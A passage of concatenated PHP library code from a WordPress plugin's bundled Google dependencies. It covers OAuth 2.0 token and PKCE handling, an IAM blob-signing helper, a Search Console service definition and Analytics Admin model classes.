($resp->hasHeader('Content-Type') && $resp->getHeaderLine('Content-Type') == 'application/x-www-form-urlencoded') { $res = []; \parse_str($body, $res); return $res; } // Assume it's JSON; if it's not throw an exception if (null === ($res = \json_decode($body, \true))) { throw new \Exception('Invalid JSON response'); } return $res; } /** * Updates an OAuth 2.0 client. * * Example: * ``` * $oauth->updateToken([ * 'refresh_token' => 'n4E9O119d', * 'access_token' => 'FJQbwq9', * 'expires_in' => 3600 * ]); * ``` * * @param array<mixed> $config * The configuration parameters related to the token. * * - refresh_token * The refresh token associated with the access token * to be refreshed. * * - access_token * The current access token for this client. * * - id_token * The current ID token for this client. * * - expires_in * The time in seconds until access token expiration. * * - expires_at * The time as an integer number of seconds since the Epoch * * - issued_at * The timestamp that the token was issued at. * @return void */ public function updateToken(array $config) { $opts = \array_merge(['extensionParams' => [], 'access_token' => null, 'id_token' => null, 'expires_in' => null, 'expires_at' => null, 'issued_at' => null, 'scope' => null], $config); $this->setExpiresAt($opts['expires_at']); $this->setExpiresIn($opts['expires_in']); // By default, the token is issued at `Time.now` when `expiresIn` is set, // but this can be used to supply a more precise time. if (!\is_null($opts['issued_at'])) { $this->setIssuedAt($opts['issued_at']); } $this->setAccessToken($opts['access_token']); $this->setIdToken($opts['id_token']); // The refresh token should only be updated if a value is explicitly // passed in, as some access token responses do not include a refresh // token. if (\array_key_exists('refresh_token', $opts)) { $this->setRefreshToken($opts['refresh_token']); } // Required for STS response. An identifier for the representation of // the issued security token. if (\array_key_exists('issued_token_type', $opts)) { $this->issuedTokenType = $opts['issued_token_type']; } } /** * Builds the authorization Uri that the user should be redirected to. * * @param array<mixed> $config configuration options that customize the return url. * @return UriInterface the authorization Url. * @throws InvalidArgumentException */ public function buildFullAuthorizationUri(array $config = []) { if (\is_null($this->getAuthorizationUri())) { throw new \InvalidArgumentException('requires an authorizationUri to have been set'); } $params = \array_merge(['response_type' => 'code', 'access_type' => 'offline', 'client_id' => $this->clientId, 'redirect_uri' => $this->redirectUri, 'state' => $this->state, 'scope' => $this->getScope()], $config); // Validate the auth_params if (\is_null($params['client_id'])) { throw new \InvalidArgumentException('missing the required client identifier'); } if (\is_null($params['redirect_uri'])) { throw new \InvalidArgumentException('missing the required redirect URI'); } if (!empty($params['prompt']) && !empty($params['approval_prompt'])) { throw new \InvalidArgumentException('prompt and approval_prompt are mutually exclusive'); } if ($this->codeVerifier) { $params['code_challenge'] = $this->getCodeChallenge($this->codeVerifier); $params['code_challenge_method'] = $this->getCodeChallengeMethod(); } // Construct the uri object; return it if it is valid. $result = clone $this->authorizationUri; $existingParams = \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Query::parse($result->getQuery()); $result = $result->withQuery(\Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Query::build(\array_merge($existingParams, $params))); if ($result->getScheme() != 'https') { throw new \InvalidArgumentException('Authorization endpoint must be protected by TLS'); } return $result; } /** * @return string|null */ public function getCodeVerifier() : ?string { return $this->codeVerifier; } /** * A cryptographically random string that is used to correlate the * authorization request to the token request. * * The code verifier for PKCE for OAuth 2.0. When set, the authorization * URI will contain the Code Challenge and Code Challenge Method querystring * parameters, and the token URI will contain the Code Verifier parameter. * * @see https://datatracker.ietf.org/doc/html/rfc7636 * * @param string|null $codeVerifier */ public function setCodeVerifier(?string $codeVerifier) : void { $this->codeVerifier = $codeVerifier; } /** * Generates a random 128-character string for the "code_verifier" parameter * in PKCE for OAuth 2.0. This is a cryptographically random string that is * determined using random_int, hashed using "hash" and sha256, and base64 * encoded. * * When this method is called, the code verifier is set on the object. * * @return string */ public function generateCodeVerifier() : string { return $this->codeVerifier = $this->generateRandomString(128); } private function getCodeChallenge(string $randomString) : string { return \rtrim(\strtr(\base64_encode(\hash('sha256', $randomString, \true)), '+/', '-_'), '='); } private function getCodeChallengeMethod() : string { return 'S256'; } private function generateRandomString(int $length) : string { $validChars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-._~'; $validCharsLen = \strlen($validChars); $str = ''; $i = 0; while ($i++ < $length) { $str .= $validChars[\random_int(0, $validCharsLen - 1)]; } return $str; } /** * Sets the authorization server's HTTP endpoint capable of authenticating * the end-user and obtaining authorization. * * @param string $uri * @return void */ public function setAuthorizationUri($uri) { $this->authorizationUri = $this->coerceUri($uri); } /** * Gets the authorization server's HTTP endpoint capable of authenticating * the end-user and obtaining authorization. * * @return ?UriInterface */ public function getAuthorizationUri() { return $this->authorizationUri; } /** * Gets the authorization server's HTTP endpoint capable of issuing tokens * and refreshing expired tokens. * * @return ?UriInterface */ public function getTokenCredentialUri() { return $this->tokenCredentialUri; } /** * Sets the authorization server's HTTP endpoint capable of issuing tokens * and refreshing expired tokens. * * @param string $uri * @return void */ public function setTokenCredentialUri($uri) { $this->tokenCredentialUri = $this->coerceUri($uri); } /** * Gets the redirection URI used in the initial request. * * @return ?string */ public function getRedirectUri() { return $this->redirectUri; } /** * Sets the redirection URI used in the initial request. * * @param ?string $uri * @return void */ public function setRedirectUri($uri) { if (\is_null($uri)) { $this->redirectUri = null; return; } // redirect URI must be absolute if (!$this->isAbsoluteUri($uri)) { // "postmessage" is a reserved URI string in Google-land // @see https://developers.google.com/identity/sign-in/web/server-side-flow if ('postmessage' !== (string) $uri) { throw new \InvalidArgumentException('Redirect URI must be absolute'); } } $this->redirectUri = (string) $uri; } /** * Gets the scope of the access requests as a space-delimited String. * * @return ?string */ public function getScope() { if (\is_null($this->scope)) { return $this->scope; } return \implode(' ', $this->scope); } /** * Sets the scope of the access request, expressed either as an Array or as * a space-delimited String. * * @param string|array<string>|null $scope * @return void * @throws InvalidArgumentException */ public function setScope($scope) { if (\is_null($scope)) { $this->scope = null; } elseif (\is_string($scope)) { $this->scope = \explode(' ', $scope); } elseif (\is_array($scope)) { foreach ($scope as $s) { $pos = \strpos($s, ' '); if ($pos !== \false) { throw new \InvalidArgumentException('array scope values should not contain spaces'); } } $this->scope = $scope; } else { throw new \InvalidArgumentException('scopes should be a string or array of strings'); } } /** * Gets the current grant type. * * @return ?string */ public function getGrantType() { if (!\is_null($this->grantType)) { return $this->grantType; } // Returns the inferred grant type, based on the current object instance // state. if (!\is_null($this->code)) { return 'authorization_code'; } if (!\is_null($this->refreshToken)) { return 'refresh_token'; } if (!\is_null($this->username) && !\is_null($this->password)) { return 'password'; } if (!\is_null($this->issuer) && !\is_null($this->signingKey)) { return self::JWT_URN; } if (!\is_null($this->subjectTokenFetcher) && !\is_null($this->subjectTokenType)) { return self::STS_URN; } return null; } /** * Sets the current grant type. * * @param string $grantType * @return void * @throws InvalidArgumentException */ public function setGrantType($grantType) { if (\in_array($grantType, self::$knownGrantTypes)) { $this->grantType = $grantType; } else { // validate URI if (!$this->isAbsoluteUri($grantType)) { throw new \InvalidArgumentException('invalid grant type'); } $this->grantType = (string) $grantType; } } /** * Gets an arbitrary string designed to allow the client to maintain state. * * @return string */ public function getState() { return $this->state; } /** * Sets an arbitrary string designed to allow the client to maintain state. * * @param string $state * @return void */ public function setState($state) { $this->state = $state; } /** * Gets the authorization code issued to this client. * * @return string */ public function getCode() { return $this->code; } /** * Sets the authorization code issued to this client. * * @param string $code * @return void */ public function setCode($code) { $this->code = $code; } /** * Gets the resource owner's username. * * @return string */ public function getUsername() { return $this->username; } /** * Sets the resource owner's username. * * @param string $username * @return void */ public function setUsername($username) { $this->username = $username; } /** * Gets the resource owner's password. * * @return string */ public function getPassword() { return $this->password; } /** * Sets the resource owner's password. * * @param string $password * @return void */ public function setPassword($password) { $this->password = $password; } /** * Sets a unique identifier issued to the client to identify itself to the * authorization server. * * @return string */ public function getClientId() { return $this->clientId; } /** * Sets a unique identifier issued to the client to identify itself to the * authorization server. * * @param string $clientId * @return void */ public function setClientId($clientId) { $this->clientId = $clientId; } /** * Gets a shared symmetric secret issued by the authorization server, which * is used to authenticate the client. * * @return string */ public function getClientSecret() { return $this->clientSecret; } /** * Sets a shared symmetric secret issued by the authorization server, which * is used to authenticate the client. * * @param string $clientSecret * @return void */ public function setClientSecret($clientSecret) { $this->clientSecret = $clientSecret; } /** * Gets the Issuer ID when using assertion profile. * * @return ?string */ public function getIssuer() { return $this->issuer; } /** * Sets the Issuer ID when using assertion profile. * * @param string $issuer * @return void */ public function setIssuer($issuer) { $this->issuer = $issuer; } /** * Gets the target sub when issuing assertions. * * @return ?string */ public function getSub() { return $this->sub; } /** * Sets the target sub when issuing assertions. * * @param string $sub * @return void */ public function setSub($sub) { $this->sub = $sub; } /** * Gets the target audience when issuing assertions. * * @return ?string */ public function getAudience() { return $this->audience; } /** * Sets the target audience when issuing assertions. * * @param string $audience * @return void */ public function setAudience($audience) { $this->audience = $audience; } /** * Gets the signing key when using an assertion profile. * * @return ?string */ public function getSigningKey() { return $this->signingKey; } /** * Sets the signing key when using an assertion profile. * * @param string $signingKey * @return void */ public function setSigningKey($signingKey) { $this->signingKey = $signingKey; } /** * Gets the signing key id when using an assertion profile. * * @return ?string */ public function getSigningKeyId() { return $this->signingKeyId; } /** * Sets the signing key id when using an assertion profile. * * @param string $signingKeyId * @return void */ public function setSigningKeyId($signingKeyId) { $this->signingKeyId = $signingKeyId; } /** * Gets the signing algorithm when using an assertion profile. * * @return ?string */ public function getSigningAlgorithm() { return $this->signingAlgorithm; } /** * Sets the signing algorithm when using an assertion profile. * * @param ?string $signingAlgorithm * @return void */ public function setSigningAlgorithm($signingAlgorithm) { if (\is_null($signingAlgorithm)) { $this->signingAlgorithm = null; } elseif (!\in_array($signingAlgorithm, self::$knownSigningAlgorithms)) { throw new \InvalidArgumentException('unknown signing algorithm'); } else { $this->signingAlgorithm = $signingAlgorithm; } } /** * Gets the set of parameters used by extension when using an extension * grant type. * * @return array<mixed> */ public function getExtensionParams() { return $this->extensionParams; } /** * Sets the set of parameters used by extension when using an extension * grant type. * * @param array<mixed> $extensionParams * @return void */ public function setExtensionParams($extensionParams) { $this->extensionParams = $extensionParams; } /** * Gets the number of seconds assertions are valid for. * * @return int */ public function getExpiry() { return $this->expiry; } /** * Sets the number of seconds assertions are valid for. * * @param int $expiry * @return void */ public function setExpiry($expiry) { $this->expiry = $expiry; } /** * Gets the lifetime of the access token in seconds. * * @return int */ public function getExpiresIn() { return $this->expiresIn; } /** * Sets the lifetime of the access token in seconds. * * @param ?int $expiresIn * @return void */ public function setExpiresIn($expiresIn) { if (\is_null($expiresIn)) { $this->expiresIn = null; $this->issuedAt = null; } else { $this->issuedAt = \time(); $this->expiresIn = (int) $expiresIn; } } /** * Gets the time the current access token expires at. * * @return ?int */ public function getExpiresAt() { if (!\is_null($this->expiresAt)) { return $this->expiresAt; } if (!\is_null($this->issuedAt) && !\is_null($this->expiresIn)) { return $this->issuedAt + $this->expiresIn; } return null; } /** * Returns true if the acccess token has expired. * * @return bool */ public function isExpired() { $expiration = $this->getExpiresAt(); $now = \time(); return !\is_null($expiration) && $now >= $expiration; } /** * Sets the time the current access token expires at. * * @param int $expiresAt * @return void */ public function setExpiresAt($expiresAt) { $this->expiresAt = $expiresAt; } /** * Gets the time the current access token was issued at. * * @return ?int */ public function getIssuedAt() { return $this->issuedAt; } /** * Sets the time the current access token was issued at. * * @param int $issuedAt * @return void */ public function setIssuedAt($issuedAt) { $this->issuedAt = $issuedAt; } /** * Gets the current access token. * * @return ?string */ public function getAccessToken() { return $this->accessToken; } /** * Sets the current access token. * * @param string $accessToken * @return void */ public function setAccessToken($accessToken) { $this->accessToken = $accessToken; } /** * Gets the current ID token. * * @return ?string */ public function getIdToken() { return $this->idToken; } /** * Sets the current ID token. * * @param string $idToken * @return void */ public function setIdToken($idToken) { $this->idToken = $idToken; } /** * Get the granted space-separated scopes (if they exist) for the last * fetched token. * * @return string|null */ public function getGrantedScope() { return $this->grantedScope; } /** * Sets the current ID token. * * @param string $grantedScope * @return void */ public function setGrantedScope($grantedScope) { $this->grantedScope = $grantedScope; } /** * Gets the refresh token associated with the current access token. * * @return ?string */ public function getRefreshToken() { return $this->refreshToken; } /** * Sets the refresh token associated with the current access token. * * @param string $refreshToken * @return void */ public function setRefreshToken($refreshToken) { $this->refreshToken = $refreshToken; } /** * Sets additional claims to be included in the JWT token * * @param array<mixed> $additionalClaims * @return void */ public function setAdditionalClaims(array $additionalClaims) { $this->additionalClaims = $additionalClaims; } /** * Gets the additional claims to be included in the JWT token. * * @return array<mixed> */ public function getAdditionalClaims() { return $this->additionalClaims; } /** * Gets the additional claims to be included in the JWT token. * * @return ?string */ public function getIssuedTokenType() { return $this->issuedTokenType; } /** * The expiration of the last received token. * * @return array<mixed>|null */ public function getLastReceivedToken() { if ($token = $this->getAccessToken()) { // the bare necessity of an auth token $authToken = ['access_token' => $token, 'expires_at' => $this->getExpiresAt()]; } elseif ($idToken = $this->getIdToken()) { $authToken = ['id_token' => $idToken, 'expires_at' => $this->getExpiresAt()]; } else { return null; } if ($expiresIn = $this->getExpiresIn()) { $authToken['expires_in'] = $expiresIn; } if ($issuedAt = $this->getIssuedAt()) { $authToken['issued_at'] = $issuedAt; } if ($refreshToken = $this->getRefreshToken()) { $authToken['refresh_token'] = $refreshToken; } return $authToken; } /** * Get the client ID. * * Alias of {@see Google\Auth\OAuth2::getClientId()}. * * @param callable $httpHandler * @return string * @access private */ public function getClientName(?callable $httpHandler = null) { return $this->getClientId(); } /** * @todo handle uri as array * * @param ?string $uri * @return null|UriInterface */ private function coerceUri($uri) { if (\is_null($uri)) { return null; } return \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::uriFor($uri); } /** * @param string $idToken * @param Key|Key[]|string|string[] $publicKey * @param string|string[] $allowedAlgs * @return object */ private function jwtDecode($idToken, $publicKey, $allowedAlgs) { $keys = $this->getFirebaseJwtKeys($publicKey, $allowedAlgs); // Default exception if none are caught. We are using the same exception // class and message from firebase/php-jwt to preserve backwards // compatibility. $e = new \InvalidArgumentException('Key may not be empty'); foreach ($keys as $key) { try { return \Google\Site_Kit_Dependencies\Firebase\JWT\JWT::decode($idToken, $key); } catch (\Exception $e) { // try next alg } } throw $e; } /** * @param Key|Key[]|string|string[] $publicKey * @param string|string[] $allowedAlgs * @return Key[] */ private function getFirebaseJwtKeys($publicKey, $allowedAlgs) { // If $publicKey is instance of Key, return it if ($publicKey instanceof \Google\Site_Kit_Dependencies\Firebase\JWT\Key) { return [$publicKey]; } // If $allowedAlgs is empty, $publicKey must be Key or Key[]. if (empty($allowedAlgs)) { $keys = []; foreach ((array) $publicKey as $kid => $pubKey) { if (!$pubKey instanceof \Google\Site_Kit_Dependencies\Firebase\JWT\Key) { throw new \InvalidArgumentException(\sprintf('When allowed algorithms is empty, the public key must' . 'be an instance of %s or an array of %s objects', \Google\Site_Kit_Dependencies\Firebase\JWT\Key::class, \Google\Site_Kit_Dependencies\Firebase\JWT\Key::class)); } $keys[$kid] = $pubKey; } return $keys; } $allowedAlg = null; if (\is_string($allowedAlgs)) { $allowedAlg = $allowedAlgs; } elseif (\is_array($allowedAlgs)) { if (\count($allowedAlgs) > 1) { throw new \InvalidArgumentException('To have multiple allowed algorithms, You must provide an' . ' array of Firebase\\JWT\\Key objects.' . ' See https://github.com/firebase/php-jwt for more information.'); } $allowedAlg = \array_pop($allowedAlgs); } else { throw new \InvalidArgumentException('allowed algorithms must be a string or array.'); } if (\is_array($publicKey)) { // When publicKey is greater than 1, create keys with the single alg. $keys = []; foreach ($publicKey as $kid => $pubKey) { if ($pubKey instanceof \Google\Site_Kit_Dependencies\Firebase\JWT\Key) { $keys[$kid] = $pubKey; } else { $keys[$kid] = new \Google\Site_Kit_Dependencies\Firebase\JWT\Key($pubKey, $allowedAlg); } } return $keys; } return [new \Google\Site_Kit_Dependencies\Firebase\JWT\Key($publicKey, $allowedAlg)]; } /** * Determines if the URI is absolute based on its scheme and host or path * (RFC 3986). * * @param string $uri * @return bool */ private function isAbsoluteUri($uri) { $uri = $this->coerceUri($uri); return $uri->getScheme() && ($uri->getHost() || $uri->getPath()); } /** * @param array<mixed> $params * @return array<mixed> */ private function addClientCredentials(&$params) { $clientId = $this->getClientId(); $clientSecret = $this->getClientSecret(); if ($clientId && $clientSecret) { $params['client_id'] = $clientId; $params['client_secret'] = $clientSecret; } return $params; } } <?php /* * Copyright 2019 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth; /** * Describes a class which supports signing arbitrary strings. */ interface SignBlobInterface extends \Google\Site_Kit_Dependencies\Google\Auth\FetchAuthTokenInterface { /** * Sign a string using the method which is best for a given credentials type. * * @param string $stringToSign The string to sign. * @param bool $forceOpenssl Require use of OpenSSL for local signing. Does * not apply to signing done using external services. **Defaults to** * `false`. * @return string The resulting signature. Value should be base64-encoded. */ public function signBlob($stringToSign, $forceOpenssl = \false); /** * Returns the current Client Name. * * @param callable $httpHandler callback which delivers psr7 request, if * one is required to obtain a client name. * @return string */ public function getClientName(?callable $httpHandler = null); } <?php /* * Copyright 2019 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ namespace Google\Site_Kit_Dependencies\Google\Auth; use Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpClientCache; use Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpHandlerFactory; use Google\Site_Kit_Dependencies\GuzzleHttp\Psr7; use Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils; /** * Tools for using the IAM API. * * @see https://cloud.google.com/iam/docs IAM Documentation */ class Iam { /** * @deprecated */ const IAM_API_ROOT = 'https://iamcredentials.googleapis.com/v1'; const SIGN_BLOB_PATH = '%s:signBlob?alt=json'; const SERVICE_ACCOUNT_NAME = 'projects/-/serviceAccounts/%s'; private const IAM_API_ROOT_TEMPLATE = 'https://iamcredentials.UNIVERSE_DOMAIN/v1'; /** * @var callable */ private $httpHandler; private string $universeDomain; /** * @param callable $httpHandler [optional] The HTTP Handler to send requests. */ public function __construct(?callable $httpHandler = null, string $universeDomain = \Google\Site_Kit_Dependencies\Google\Auth\GetUniverseDomainInterface::DEFAULT_UNIVERSE_DOMAIN) { $this->httpHandler = $httpHandler ?: \Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpHandlerFactory::build(\Google\Site_Kit_Dependencies\Google\Auth\HttpHandler\HttpClientCache::getHttpClient()); $this->universeDomain = $universeDomain; } /** * Sign a string using the IAM signBlob API. * * Note that signing using IAM requires your service account to have the * `iam.serviceAccounts.signBlob` permission, part of the "Service Account * Token Creator" IAM role. * * @param string $email The service account email. * @param string $accessToken An access token from the service account. * @param string $stringToSign The string to be signed. * @param array<string> $delegates [optional] A list of service account emails to * add to the delegate chain. If omitted, the value of `$email` will * be used. * @return string The signed string, base64-encoded. */ public function signBlob($email, $accessToken, $stringToSign, array $delegates = []) { $httpHandler = $this->httpHandler; $name = \sprintf(self::SERVICE_ACCOUNT_NAME, $email); $apiRoot = \str_replace('UNIVERSE_DOMAIN', $this->universeDomain, self::IAM_API_ROOT_TEMPLATE); $uri = $apiRoot . '/' . \sprintf(self::SIGN_BLOB_PATH, $name); if ($delegates) { foreach ($delegates as &$delegate) { $delegate = \sprintf(self::SERVICE_ACCOUNT_NAME, $delegate); } } else { $delegates = [$name]; } $body = ['delegates' => $delegates, 'payload' => \base64_encode($stringToSign)]; $headers = ['Authorization' => 'Bearer ' . $accessToken]; $request = new \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Request('POST', $uri, $headers, \Google\Site_Kit_Dependencies\GuzzleHttp\Psr7\Utils::streamFor(\json_encode($body))); $res = $httpHandler($request); $body = \json_decode((string) $res->getBody(), \true); return $body['signedBlob']; } } <?php namespace Google\Site_Kit_Dependencies; // For older (pre-2.7.2) verions of google/apiclient if (\file_exists(__DIR__ . '/../apiclient/src/Google/Client.php') && !\class_exists('Google\\Site_Kit_Dependencies\\Google_Client', \false)) { require_once __DIR__ . '/../apiclient/src/Google/Client.php'; if (\defined('Google_Client::LIBVER') && \version_compare(\Google\Site_Kit_Dependencies\Google_Client::LIBVER, '2.7.2', '<=')) { $servicesClassMap = ['Google\\Site_Kit_Dependencies\\Google\\Client' => 'Google_Client', 'Google\\Site_Kit_Dependencies\\Google\\Service' => 'Google_Service', 'Google\\Site_Kit_Dependencies\\Google\\Service\\Resource' => 'Google_Service_Resource', 'Google\\Site_Kit_Dependencies\\Google\\Model' => 'Google_Model', 'Google\\Site_Kit_Dependencies\\Google\\Collection' => 'Google_Collection']; foreach ($servicesClassMap as $alias => $class) { \class_alias($class, $alias); } } } \spl_autoload_register(function ($class) { if (0 === \strpos($class, 'Google_Service_')) { // Autoload the new class, which will also create an alias for the // old class by changing underscores to namespaces: // Google_Service_Speech_Resource_Operations // => Google\Service\Speech\Resource\Operations $classExists = \class_exists($newClass = \str_replace('_', '\\', $class)); if ($classExists) { return \true; } } }, \true, \true); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service; use Google\Site_Kit_Dependencies\Google\Client; /** * Service definition for SearchConsole (v1). * * <p> * The Search Console API provides access to both Search Console data (verified * users only) and to public information on an URL basis (anyone)</p> * * <p> * For more information about this service, see the API * <a href="https://developers.google.com/webmaster-tools/search-console-api/" target="_blank">Documentation</a> * </p> * * @author Google, Inc. */ class SearchConsole extends \Google\Site_Kit_Dependencies\Google\Service { /** View and manage Search Console data for your verified sites. */ const WEBMASTERS = "https://www.googleapis.com/auth/webmasters"; /** View Search Console data for your verified sites. */ const WEBMASTERS_READONLY = "https://www.googleapis.com/auth/webmasters.readonly"; public $searchanalytics; public $sitemaps; public $sites; public $urlInspection_index; public $urlTestingTools_mobileFriendlyTest; public $rootUrlTemplate; /** * Constructs the internal representation of the SearchConsole service. * * @param Client|array $clientOrConfig The client used to deliver requests, or a * config array to pass to a new Client instance. * @param string $rootUrl The root URL used for requests to the service. */ public function __construct($clientOrConfig = [], $rootUrl = null) { parent::__construct($clientOrConfig); $this->rootUrl = $rootUrl ?: 'https://searchconsole.googleapis.com/'; $this->rootUrlTemplate = $rootUrl ?: 'https://searchconsole.UNIVERSE_DOMAIN/'; $this->servicePath = ''; $this->batchPath = 'batch'; $this->version = 'v1'; $this->serviceName = 'searchconsole'; $this->searchanalytics = new \Google\Site_Kit_Dependencies\Google\Service\SearchConsole\Resource\Searchanalytics($this, $this->serviceName, 'searchanalytics', ['methods' => ['query' => ['path' => 'webmasters/v3/sites/{siteUrl}/searchAnalytics/query', 'httpMethod' => 'POST', 'parameters' => ['siteUrl' => ['location' => 'path', 'type' => 'string', 'required' => \true]]]]]); $this->sitemaps = new \Google\Site_Kit_Dependencies\Google\Service\SearchConsole\Resource\Sitemaps($this, $this->serviceName, 'sitemaps', ['methods' => ['delete' => ['path' => 'webmasters/v3/sites/{siteUrl}/sitemaps/{feedpath}', 'httpMethod' => 'DELETE', 'parameters' => ['siteUrl' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'feedpath' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'get' => ['path' => 'webmasters/v3/sites/{siteUrl}/sitemaps/{feedpath}', 'httpMethod' => 'GET', 'parameters' => ['siteUrl' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'feedpath' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'list' => ['path' => 'webmasters/v3/sites/{siteUrl}/sitemaps', 'httpMethod' => 'GET', 'parameters' => ['siteUrl' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'sitemapIndex' => ['location' => 'query', 'type' => 'string']]], 'submit' => ['path' => 'webmasters/v3/sites/{siteUrl}/sitemaps/{feedpath}', 'httpMethod' => 'PUT', 'parameters' => ['siteUrl' => ['location' => 'path', 'type' => 'string', 'required' => \true], 'feedpath' => ['location' => 'path', 'type' => 'string', 'required' => \true]]]]]); $this->sites = new \Google\Site_Kit_Dependencies\Google\Service\SearchConsole\Resource\Sites($this, $this->serviceName, 'sites', ['methods' => ['add' => ['path' => 'webmasters/v3/sites/{siteUrl}', 'httpMethod' => 'PUT', 'parameters' => ['siteUrl' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'delete' => ['path' => 'webmasters/v3/sites/{siteUrl}', 'httpMethod' => 'DELETE', 'parameters' => ['siteUrl' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'get' => ['path' => 'webmasters/v3/sites/{siteUrl}', 'httpMethod' => 'GET', 'parameters' => ['siteUrl' => ['location' => 'path', 'type' => 'string', 'required' => \true]]], 'list' => ['path' => 'webmasters/v3/sites', 'httpMethod' => 'GET', 'parameters' => []]]]); $this->urlInspection_index = new \Google\Site_Kit_Dependencies\Google\Service\SearchConsole\Resource\UrlInspectionIndex($this, $this->serviceName, 'index', ['methods' => ['inspect' => ['path' => 'v1/urlInspection/index:inspect', 'httpMethod' => 'POST', 'parameters' => []]]]); $this->urlTestingTools_mobileFriendlyTest = new \Google\Site_Kit_Dependencies\Google\Service\SearchConsole\Resource\UrlTestingToolsMobileFriendlyTest($this, $this->serviceName, 'mobileFriendlyTest', ['methods' => ['run' => ['path' => 'v1/urlTestingTools/mobileFriendlyTest:run', 'httpMethod' => 'POST', 'parameters' => []]]]); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\SearchConsole::class, 'Google\\Site_Kit_Dependencies\\Google_Service_SearchConsole'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaListFirebaseLinksResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'firebaseLinks'; protected $firebaseLinksType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaFirebaseLink::class; protected $firebaseLinksDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param GoogleAnalyticsAdminV1alphaFirebaseLink[] */ public function setFirebaseLinks($firebaseLinks) { $this->firebaseLinks = $firebaseLinks; } /** * @return GoogleAnalyticsAdminV1alphaFirebaseLink[] */ public function getFirebaseLinks() { return $this->firebaseLinks; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListFirebaseLinksResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaListFirebaseLinksResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterBetweenFilter extends \Google\Site_Kit_Dependencies\Google\Model { protected $fromValueType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterNumericValue::class; protected $fromValueDataType = ''; protected $toValueType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterNumericValue::class; protected $toValueDataType = ''; /** * @param GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterNumericValue */ public function setFromValue(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterNumericValue $fromValue) { $this->fromValue = $fromValue; } /** * @return GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterNumericValue */ public function getFromValue() { return $this->fromValue; } /** * @param GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterNumericValue */ public function setToValue(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceDimensionOrMetricFilterNumericValue $toValue) { $this->toValue = $toValue; } /** * @return 